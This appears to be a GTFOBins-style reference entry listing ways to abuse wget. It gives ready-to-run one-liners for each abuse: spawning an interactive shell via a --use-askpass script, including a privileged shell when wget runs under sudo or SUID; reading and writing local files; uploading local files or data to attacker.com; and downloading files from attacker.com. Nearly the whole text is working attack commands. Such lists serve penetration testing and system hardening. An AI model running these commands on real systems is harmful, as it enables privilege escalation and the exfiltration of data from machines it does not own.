This executable can spawn an interactive system shell.
This function can be performed by any unprivileged user.
echo -e '#!/bin/sh\n/bin/sh 1>&0' >/path/to/temp-file
chmod +x /path/to/temp-file
wget --use-askpass=/path/to/temp-file 0
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
echo -e '#!/bin/sh\n/bin/sh 1>&0' >/path/to/temp-file
chmod +x /path/to/temp-file
wget --use-askpass=/path/to/temp-file 0
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
echo -e '#!/bin/sh -p\n/bin/sh -p 1>&0' >/path/to/temp-file
chmod +x /path/to/temp-file
wget --use-askpass=/path/to/temp-file 0
This executable can write data to local files.
This function can be performed by any unprivileged user.
wget -i /path/to/input-file -o /path/to/output-file
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
wget -i /path/to/input-file -o /path/to/output-file
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
wget -i /path/to/input-file -o /path/to/output-file
This executable can read data from local files.
This function can be performed by any unprivileged user.
wget -i /path/to/input-file
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
wget -i /path/to/input-file
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
wget -i /path/to/input-file
This executable can upload local data.
This function can be performed by any unprivileged user.
wget --post-file=/path/to/input-file http://attacker.com
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
wget --post-file=/path/to/input-file http://attacker.com
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
wget --post-file=/path/to/input-file http://attacker.com
This function can be performed by any unprivileged user.
wget --post-data=DATA http://attacker.com
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
wget --post-data=DATA http://attacker.com
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
wget --post-data=DATA http://attacker.com
This executable can download remote data.
This function can be performed by any unprivileged user.
wget http://attacker.com/path/to/input-file -O /path/to/output-file
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
wget http://attacker.com/path/to/input-file -O /path/to/output-file
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
wget http://attacker.com/path/to/input-file -O /path/to/output-file